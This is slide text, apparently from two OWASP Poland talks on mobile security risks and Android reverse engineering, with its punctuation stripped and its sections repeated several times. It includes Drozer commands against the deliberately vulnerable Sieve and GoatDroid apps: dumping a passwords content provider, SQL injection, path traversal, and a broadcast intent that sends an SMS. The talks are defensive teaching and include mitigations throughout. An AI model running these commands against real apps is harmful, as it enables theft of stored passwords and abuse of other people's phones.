bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
